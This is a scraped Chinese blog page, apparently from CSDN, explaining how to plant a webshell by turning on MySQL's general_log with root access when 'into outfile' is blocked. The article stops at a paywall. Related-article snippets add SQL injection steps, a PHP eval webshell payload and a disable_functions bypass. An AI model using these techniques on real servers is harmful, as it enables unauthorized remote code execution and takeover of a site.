mysql log 写shell_利用mysql general log 写shell 可行性简要分析

最新推荐文章于 2024-03-20 08:01:11 发布
最新推荐文章于 2024-03-20 08:01:11 发布
阅读量777 收藏
点赞数 1
文章标签: mysql log 写shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39867594/article/details/113688799
版权

0×01 前言

实际渗透过程中,我们很可能会遇到这样的情况,明明是正儿八经的mysql root权限,但实际利用into outfile写shell的时候,却怎么都写不进去,前提可以肯定的是,我们对目标的网站目录绝对是有写权限的且mysql的root用户本身并没有被降权,一般出现这样的情况很可能就是因为into outfile被禁用或waf拦截,希望下面的方式能帮到你

eb98853516947634c91280a3031f288c.png

0×02 拿shell

利用mysql日志文件来写shell,究其原理其实也非常简单,当我们开启general_log以后,每执行一条sql都会被自动记录到这个日志文件中,我们就可以通过这种方式,把我们的shell代码也自动写进去,运维可能平时都是拿这个来查慢查询,只会临时开启下,所以,如果想利用,就只能我们自己手动开,这就是为什么要root权限才行,因为它涉及到mysql自身参数配置,其实,这里稍微有点儿mysql常识心里都很清楚:

先看下当前mysql默认的日志位置在什么地方,’C:\ProgramData\MySQL\MySQL Server 5.5\Data\2008R2DC.log’

顺手把原来正常的日志路径稍微记录下,等会儿干完活儿再把它恢复回来

mysql> show variables like '%general%';

默认基本都是关闭的,不然这个增删改查的记录量可能会非常大

mysql> set global general_log = on;

最低0.47元/天 解锁文章
weixin_39867594
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql 开启日志 shell_【安全科普】SQL语句利用日志shell及相关绕过
weixin_29001327的博客
01-27 563
原标题:【安全科普】SQL语句利用日志shell及相关绕过● 0x01 基本原理●在能够SQL语句的地方,outfile、dumpfile、drop database等都被禁止,一般进行SQL注入来getshell或删库的方式行不通了。但是如果MySQL是root用户启动的,那么可以进行如下利用:1showvariableslike'%general%'; #查看配置23setglobalge...
mysqlshell
weixin_47385895的博客
08-22 1879
mysql常见shell方法
Mysql 后台日志shell(root权限
haoge1998的博客
04-15 1801
Mysql shell 一、后台日志shell 前提: 需要有root权限 outfile被禁止 文件入被拦截 1、查看配置 是否开启日志 日志入路径 show variables like '%general%'; 2、开启general log模式为on set global general_log = on; 3、设置目录为shell地址 set global general_log_file = '/var/www/html'; 4、shell select '<?
Mysqlshell的几种方式
Redredredfish的博客
08-23 7714
Mysqlshell的几种方式 当我们拿到数据库权限时,可通过数据库管理工具入webshell到目标服务器上,利用webshell控制目标服务器。 复现环境: phpstudy_pro 8.1.0.6 mysql 5.7.26 root权限 网站绝对路径为D:\phpstudy_pro\WWW 利用方式: 通过outfileshell 尝试通过outfile入文件 报错[Code: 1290, SQL State: HY000]The MySQL server is running with
通过MySQL入webshell的几种方式(小宇特详解)
小宇的web博客
08-07 5256
通过MySQL入webshell的几种方式 -01-通过outfileshell 利用条件 1.root权限2.网站的绝对路径且具有权限,能够使用into outfile和into dumpfile来进行入。 这里用了以下的shell union select 1,"<?php eval($_REQUEST[8])?>" into outfile 'C:/phpStudy/WWW/4448.php' 这里连接蚁剑 -02-将shell入表中 利用条件 1.root权限2.网站
清理Mysql general_log的方法总结
09-09
general_log_file = /data/mysql/new_general_log.CSV ``` 这样可以将日志文件移动到更大磁盘上,防止空间不足的问题。 以上方法各有优缺点。方法1较为彻底,但耗时较长;方法2快速且简单,但仅适用于CSV格式;...
mysqlgeneral_log日志知识点介绍
09-09
MySQL中的`general_log`日志是数据库管理系统用来记录所有SQL查询的一个功能,它记录了数据库服务器接收到的所有请求,包括数据定义语言(DDL)、数据操纵语言(DML)以及数据控制语言(DCL)操作。这使得开发人员和...
9 关系查询及其优化.zip_MySQL数据库_Shell__MySQL数据库_Shell_
08-09
Shell脚本中,可以利用MySQL命令行客户端(mysql)执行SQL语句,或者通过重定向(>)和管道(|)将输出传递给其他命令,实现复杂的数据库维护任务。 例如,一个简单的Shell脚本可能包含以下内容: ```bash #!/bin...
grid_new.rar_grid环境_shell mysql_药物
09-14
在linux环境下开发的药物网格程序。使用linux下的php+mysql+shell编程。通过登录主节点页面,其它子节点注册后系统自动发送dock和计算文件到各个子节点。使用网格技术,大大节省了程序计算的时间。
jsp拿不到回显数据_渗透mysql数据库总结
weixin_39531582的博客
11-21 287
前言今天给大家总结一下渗透mysql的一些技巧。本文只是点到为止,不会讲的太细。一、sqlshell获取要利用mysql首先得拿到一个可以执行sql的mysql才能利用,下面就说一下几种常见姿势,欢迎补充。1、弱口令这个比较简单,网上工具很多如美杜莎,九头蛇这些比较知名的,msf也有相应的模块。我自己之前也过一个。要是运气好的话直接跑到弱口令就直接进去,当然也可以配合社工字典来跑这样成功率更高。...
MySQLshell的问题
最新发布
m0_62207482的博客
03-20 660
disable_functions=phpinfo,exec,passthru,shell_exec,system,proc_ope n,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source`,但是可 以用dl扩展执行命令或者ImageMagick漏洞。secure_file_priv的值在mysql配置文件my.ini中设置,这个参数用来限制数据导入导出Mysql>=5.5.53 默认为NULL,即默认禁止导入导出。
mysql之突破文件入_利用mysqlgeneral log shell[突破into outfile]
weixin_29057163的博客
02-08 290
0x01 前言:实际渗透过程中,我们很可能会遇到这样的情况,明明是正儿八经的mysql root权限,但实际利用into outfileshell的时候,却怎么不进去,可以肯定的前提是,我们对目标的网站目录绝对是有权限的且mysql的root用户本身并没有被降权,一般出现这样的情况很可能就是因为into outfile被禁用或waf拦截,希望下面的方式能帮到你0x02 拿shell:利用my...
MySQLShell方法总结
做自己喜欢的事,并将其发挥到极致!
12-31 4739
MySQL注入点,用工具对目标站点入一句话shell,需要哪些前提条件? **root权限以及网站的绝对路径** outfile 和 dumpfile Shell 利用条件 ·数据库当前用户为root权限 ·知道当前网站的绝对路径 ·PHP的GPC为OFF状态;(魔术引号,GET、POST、COOKIE) `入的那个路径要有权限 过滤了单引号into outfile 还可以用吗 不能,GPC要OFF才行,可以测试Hex编码 基于UNION联合查询 ?id=1 UNION ALL SELECT
SQL语句利用日志shell
多崎巡礼的博客
08-20 2335
outfile被禁止,或者入文件被拦截 在数据库中操作如下:(必须是root权限) 1.show variables like ‘%general%'; #查看配置 2.set global general_log = on; #开启general log模式 3.set global general_log_file = ‘/var/www/html/1.php'; #设置日志目录为s...
mysql 日志shell脚本_编Shell脚本的最佳实践
weixin_28993425的博客
02-03 338
Shell脚本的最佳实践http://kb.cnblogs.com/page/574767/需要记住的代码有注释#!/bin/bash# Written by steven# Name: mysqldump.sh# Version: v1.0# Parameters : 无# Function: mysqldump备份mysql# Create Date:2...
mysqlshell_基于mysql下的几种shell方法
weixin_35212670的博客
01-18 2924
0x00关于mysql下的shell方法网上基本很多了,我原本也没打算总结总结的,毕竟网上已经很多了,不过在看 kilon 大佬的博客的时候,给我的感受就是明明一个几句话的东西,总能详细的,有条有理的记录下来,所以也正是如此,才有了这篇文章。0x01利用条件数据库当前用户为root权限知道当前网站的绝对路径PHP的GPC为 off状态入的那个路径存在权限0x02基于联合查询法下的两个入方...
CTF web总结--利用mysql日志getshell
bob的博客
08-30 3825
在common.php中发现执行sql语句用的多语句执行,所以可以利用多语句执行来getshell. 代码:function my_mysql_query($sql){ global $conn; if($conn->multi_query($sql)){ // do { if ($result = $conn ->store_result()) {
mysql general log_mysql开启general_log记录sql执行记录
06-06
您可以通过以下步骤开启MySQLgeneral_log,记录SQL执行记录: 1. 登录MySQL。可以使用以下命令登录MySQL: ``` mysql -u username -p ``` 其中,username是您的MySQL用户名。 2. 进入MySQL的控制台后,输入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值